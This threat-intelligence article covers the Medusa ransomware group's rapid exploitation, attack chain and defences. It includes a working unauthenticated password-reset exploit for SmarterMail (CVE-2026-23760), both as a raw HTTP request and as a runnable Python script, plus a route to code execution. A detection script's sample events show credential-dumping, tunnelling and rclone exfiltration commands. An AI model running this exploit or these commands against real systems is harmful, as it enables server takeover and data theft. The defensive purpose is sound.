Microsoft has documented a sharp escalation in tempo from the Medusa ransomware operation, which it tracks as Storm-1175. The financially motivated group is now weaponizing newly disclosed vulnerabilities within a day of their publication — and in several intrusions, exploiting zero-day flaws as much as a week before they became public. A ransomware-as-a-service crew active since June 2021, Medusa has breached more than 300 critical-infrastructure organizations as of February 2025, with healthcare providers absorbing a disproportionate share of the damage.

Inside Storm-1175

Medusa runs a double-extortion model: operators encrypt a victim's data and steal a copy first, then threaten to leak the files publicly unless the ransom is paid. That two-sided pressure undercuts the value of restoring from backups, which is why the group gravitates toward high-value targets that can tolerate little downtime. Its observed victims cluster in:

  • Healthcare organizations
  • Educational institutions
  • Professional services firms
  • Financial sector entities

Recent activity has been concentrated in Australia, the United Kingdom, and the United States. Hospitals and insurers — chronically short on patching capacity and unable to absorb outages — make especially soft targets for an adversary that can find and exploit exposed assets faster than defenders can react.

Exploitation measured in hours, not weeks

What sets Medusa apart from much of the ransomware field is raw speed. Microsoft's threat intelligence team watched Storm-1175 go from initial access through to post-compromise activity — data theft and ransomware deployment included — inside a single day, and in some cases the full chain wrapped up in hours.

Across the past three years the group has leveraged at least 16 separate vulnerabilities in widely deployed enterprise software, including:

  • Microsoft Exchange
  • Ivanti Connect Secure and Policy Secure
  • ConnectWise ScreenConnect
  • JetBrains TeamCity
  • SAP NetWeaver
  • CrushFTP and GoAnywhere MFT
  • SmarterMail and BeyondTrust
  • Papercut and SimpleHelp

In one telling example, the operators were exploiting a critical SAP NetWeaver flaw just one day after its public disclosure on April 24, 2025 — leaving defenders effectively no time to patch ahead of attack.

Striking before disclosure

The most concerning detail in Microsoft's reporting is Medusa's willingness to burn zero-days. Storm-1175 has exploited at least three confirmed zero-day vulnerabilities, two of which are named:

  • CVE-2026-23760 — a zero-day in SmarterMail
  • CVE-2025-10035 — a zero-day in GoAnywhere MFT

In some intrusions the group was already exploiting these flaws seven days before they were disclosed publicly. That pre-disclosure access implies Storm-1175 is either conducting its own vulnerability research or sourcing intelligence ahead of public release — a capability normally associated with nation-state operators rather than criminal crews. The group has also gone after Linux systems, including Oracle WebLogic deployments, chaining multiple defects together to reach remote code execution.

The SmarterMail zero-day (CVE-2026-23760)

The SmarterMail flaw is a clean example of how a single authentication weakness becomes full host compromise. According to the CVE.org record, published January 22, 2026, SmarterTools SmarterMail builds prior to build 9511 contain an authentication bypass in the password reset API.

The root cause, detailed in a public proof-of-concept by MaxMnMl, is that the force-reset-password endpoint accepts anonymous requests and never validates an existing password or a reset token when resetting system administrator accounts. An unauthenticated attacker can therefore overwrite the sysadmin password outright — the only prerequisite is knowing the admin account's username.

Proof of concept

Resetting the system administrator password is a single request:


POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145

{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}

A successful reset returns a response confirming the change:


{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}

Once logged in as system administrator, the attacker reaches code execution through built-in functionality rather than a second bug: the Volume Mount Command setting accepts an arbitrary operating-system command, and the host executes it as soon as the configuration is saved. The result is full remote code execution on the mail server.

Detection

Exposed SmarterMail instances can be fingerprinted in internet-scan search engines with queries such as title='SmarterMail' or html:'SmarterMail'; a patched instance reports build 9511 or later. ProjectDiscovery publishes a detection check for this issue as a Nuclei template. Note that the GoAnywhere MFT zero-day (CVE-2025-10035) is named in Microsoft's reporting but no public reproduction detail is available for it here, so treat it as a patch-now item rather than something to test against blind.
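The request and response shown above, rebuilt as a small Python module so the authentication bypass and the build check can be exercised together. This is an added example by the editor, not MaxMnMl's proof of concept or ProjectDiscovery's template: the JSON keys, the path and the port 9998 come from the request on the page, the sample response body is constructed from the response on the page, and the host, username and password arguments are placeholders. A successful call overwrites the administrator password, so run it only against systems you are authorised to test.

```python
"""CVE-2026-23760: unauthenticated SmarterMail sysadmin password reset.

Added example (editor's code, not the PoC author's or SmarterTools' code).
Rebuilds the POST from the page and parses the reply shape from the page.
"""
import http.client
import json
import ssl
import sys

FIRST_FIXED_BUILD = 9511   # per the CVE record: builds before 9511 are affected
RESET_PATH = "/api/v1/auth/force-reset-password"
DEFAULT_PORT = 9998        # administrative web port used in the PoC request


def is_vulnerable_build(build: int) -> bool:
    """True when the installed build predates the first fixed build."""
    return build < FIRST_FIXED_BUILD


def build_reset_payload(username: str, new_password: str) -> dict:
    """The JSON body from the PoC. Vulnerable builds never check OldPassword,
    so any string works; IsSysAdmin is the string "true", exactly as in the PoC."""
    return {
        "IsSysAdmin": "true",
        "OldPassword": "watever",
        "Username": username,
        "NewPassword": new_password,
        "ConfirmPassword": new_password,
    }


def reset_succeeded(body: str) -> bool:
    """Parse the API reply; success is signalled by success=true and resultCode 200."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return False
    return data.get("success") is True and data.get("resultCode") == 200


def reset_sysadmin_password(host, username, new_password,
                            port=DEFAULT_PORT, tls=False, timeout=10):
    """Send the reset with no session cookie and no reset token.
    Returns (http_status, response_text, succeeded)."""
    if tls:
        ctx = ssl._create_unverified_context()  # self-signed certs are common on 9998
        conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    body = json.dumps(build_reset_payload(username, new_password))
    conn.request("POST", RESET_PATH, body=body,
                 headers={"Content-Type": "application/json"})
    resp = conn.getresponse()
    text = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, text, reset_succeeded(text)


# Constructed from the successful response shown on the page (debugInfo trimmed).
SAMPLE_SUCCESS = ('{"username":"","errorCode":"","errorData":"","debugInfo":"",'
                  '"success":true,"resultCode":200}')

if __name__ == "__main__":
    if len(sys.argv) < 4:
        sys.exit("usage: reset.py <host> <admin-username> <new-password>")
    status, text, ok = reset_sysadmin_password(sys.argv[1], sys.argv[2], sys.argv[3])
    print(status, "reset succeeded" if ok else "reset failed", text[:200])
```

The only prerequisite, as the text notes, is the administrator username; there is no non-destructive probe on the page, so for a read-only check compare the build number against 9511 instead of calling the endpoint.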

The attack chain

After establishing a foothold — typically via phishing or vulnerability exploitation — Storm-1175 runs a consistent, well-drilled sequence:

  • Drops a web shell or remote-access payload for persistence
  • Conducts reconnaissance and moves laterally across the network
  • Alters firewall rules to keep remote access open
  • Harvests and exfiltrates credentials, including those held by Veeam backup software
  • Runs file-encrypting ransomware against every reachable system

Microsoft highlighted one particularly damaging step: once the operators hold administrator credentials, they run a script to recover passwords stored inside Veeam backup software. Those recovered credentials let the group pivot to any remote hosts reachable through Veeam, sharply widening the blast radius of the encryption stage.

Living off the land

To stay under the radar and pass as routine administration, Medusa leans heavily on living-off-the-land binaries (LOLBins) and dual-use tooling already present on most enterprise networks. The observed toolkit includes:

  • PowerShell and PsExec for remote execution
  • Cloudflare Tunnels to disguise command-and-control traffic
  • RDP and assorted RMM tools for lateral movement
  • PDQ Deployer for distributing payloads
  • Impacket and Mimikatz for credential theft
  • Bandizip and Rclone for staging and exfiltrating data

Because these are legitimate tools, signature-based detection tends to miss them — defenders need anomaly- and behavior-driven monitoring to catch the abuse.
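Because the page's point is that each tool is legitimate on its own, the useful signal is the sequence: credential access, firewall changes, a tunnel, remote execution and bulk copying to a remote, all on one host within hours. The following is an added example by the editor, covering both the attack chain and the living-off-the-land toolkit described above; it is not Microsoft's detection logic. The events are constructed in the shape of Sysmon process-creation records, the field names and every regex are the editor's assumptions, and the rule that keys on the VeeamBackup database and its Credentials table is a heuristic for the Veeam credential-recovery step rather than a signature for any specific script.

```python
"""Stage-correlation detector for Storm-1175-style LOLBin chains.

Added example (editor's code). Events are constructed, not real telemetry;
regexes are heuristics to tune against your own estate.
"""
import re
from datetime import datetime, timedelta

# (kill-chain stage, rule name, case-insensitive regex over the command line)
RULES = [
    # Assumption: credential dumps read the Credentials table of the VeeamBackup DB.
    ("credential_access", "veeam_credential_dump",
     r"veeambackup.*credentials|credentials.*veeambackup"),
    ("credential_access", "mimikatz_cli", r"sekurlsa::|lsadump::|privilege::debug"),
    ("defense_evasion", "firewall_rule_added", r"netsh\s+advfirewall\s+firewall\s+add\s+rule"),
    ("command_and_control", "cloudflared_tunnel", r"cloudflared(?:\.exe)?\s+.*\btunnel\b"),
    ("lateral_movement", "psexec_remote_exec", r"psexec(?:64)?(?:\.exe)?\s+\\\\"),
    ("execution", "pdq_deploy", r"pdqdeploy"),
    ("collection", "bandizip_archive", r"bandizip|\bbz\.exe\b"),  # assumption: bz.exe is Bandizip's CLI
    # rclone pointed at a named remote ("mega:", "s3:"); two+ letters before the
    # colon so a drive letter such as D: does not match.
    ("exfiltration", "rclone_remote_copy",
     r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b.*?\s[a-z][a-z0-9_-]+:"),
]
COMPILED = [(stage, name, re.compile(pat, re.IGNORECASE)) for stage, name, pat in RULES]

# Constructed sample: one routine admin host, one host showing the chain.
SAMPLE_EVENTS = [
    {"ts": "2025-04-25T01:02:00", "host": "WS01", "user": r"CORP\jsmith",
     "cmdline": r"powershell.exe -File C:\scripts\Get-Inventory.ps1"},
    {"ts": "2025-04-25T01:10:00", "host": "SRV-BKP01", "user": r"CORP\svc_admin",
     "cmdline": r"powershell.exe -ep bypass -c Invoke-Sqlcmd -Database VeeamBackup -Query 'SELECT user_name,password FROM Credentials'"},
    {"ts": "2025-04-25T01:14:00", "host": "SRV-BKP01", "user": r"CORP\svc_admin",
     "cmdline": r"m.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"ts": "2025-04-25T01:20:00", "host": "SRV-BKP01", "user": r"CORP\svc_admin",
     "cmdline": r'netsh advfirewall firewall add rule name="Remote Mgmt" dir=in action=allow protocol=TCP localport=3389'},
    {"ts": "2025-04-25T01:25:00", "host": "SRV-BKP01", "user": r"CORP\svc_admin",
     "cmdline": r"cloudflared.exe tunnel run --token <token>"},
    {"ts": "2025-04-25T01:40:00", "host": "SRV-BKP01", "user": r"CORP\svc_admin",
     "cmdline": r"rclone.exe copy D:\Shares\Finance mega:dump --transfers 32"},
    {"ts": "2025-04-25T01:55:00", "host": "SRV-BKP01", "user": r"CORP\svc_admin",
     "cmdline": r"PsExec.exe \\FS01 -s -d cmd /c C:\temp\payload.exe"},
]


def match_rules(event):
    """Return the (stage, rule_name) pairs whose pattern hits the event's command line."""
    cmd = event.get("cmdline", "")
    return [(stage, name) for stage, name, rx in COMPILED if rx.search(cmd)]


def correlate(events, window=timedelta(hours=6), min_stages=3):
    """Group hits per host; alert when at least min_stages distinct stages fall
    inside one sliding window. Returns {host: {"stages", "rules", "first_seen",
    "last_seen", "alert"}} for hosts with any hit at all."""
    hits = {}
    for ev in events:
        for stage, name in match_rules(ev):
            hits.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["ts"]), stage, name))
    findings = {}
    for host, rows in hits.items():
        rows.sort()
        best = set()
        for i, (t0, _, _) in enumerate(rows):          # window anchored at each hit
            in_window = {s for t, s, _ in rows[i:] if t - t0 <= window}
            if len(in_window) > len(best):
                best = in_window
        findings[host] = {
            "stages": sorted(best),
            "rules": sorted({n for _, _, n in rows}),
            "first_seen": rows[0][0].isoformat(),
            "last_seen": rows[-1][0].isoformat(),
            "alert": len(best) >= min_stages,
        }
    return findings


if __name__ == "__main__":
    for host, f in correlate(SAMPLE_EVENTS).items():
        print(host, "ALERT" if f["alert"] else "ok", f["stages"], f["first_seen"], f["last_seen"])
```

Single hits still surface in the findings for triage; only the multi-stage cluster raises an alert, which is the trade-off that keeps a lone PsExec or rclone invocation by a real administrator from paging anyone while still catching a chain that, per Microsoft's observation, completes in hours.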

More than an outage

"If unchecked, the impact is bigger than a single encrypted network segment. Medusa is built for double extortion, so the ransom threat is not just downtime — it's the risk of public data exposure and downstream fallout like regulatory penalties, partner distrust, and long tail fraud from stolen data." — Pete Luban, Field CISO, AttackIQ

For regulated industries the risk compounds. A healthcare or financial victim faces not only operational disruption from encryption but the prospect of HIPAA violations, GDPR fines, and lasting reputational harm if patient or financial records are leaked. Medusa has shown it will follow through on those threats, which makes negotiation and recovery far messier than a conventional encrypt-only incident.

Defending against Medusa

Given Storm-1175's speed, defenders have to work proactively. Recommended measures include:

  • Continuous asset inventory — keep an accurate, current map of internal and internet-facing systems, prioritizing exposed assets.
  • Aggressive patching — patch internet-facing systems first and subscribe to threat intel feeds to spot zero-day exploitation early.
  • Credential hygiene — audit backup software configuration, Veeam included, so stored credentials can't be trivially harvested.
  • Network segmentation — contain lateral movement by segmenting critical systems and enforcing least-privilege access.
  • Behavioral monitoring — tune EDR and SIEM to flag LOLBin abuse, unusual RDP sessions, and anomalous Rclone or PowerShell activity.
  • Incident response readiness — test IR plans and maintain offline, immutable backups that cannot be reached through Veeam or similar platforms.

Bottom line

Medusa marks a new tier of criminal threat, pairing near nation-state vulnerability research with an industrialized RaaS pipeline. Its ability to exploit zero-days before disclosure, compress intrusions to a few hours, and single out the organizations least able to weather disruption makes it a defining threat for the foreseeable future. For healthcare, finance, and education in particular, perimeter exposure should be treated as an emergency: assume patch windows are measured in hours, not weeks, and invest in proactive threat hunting accordingly.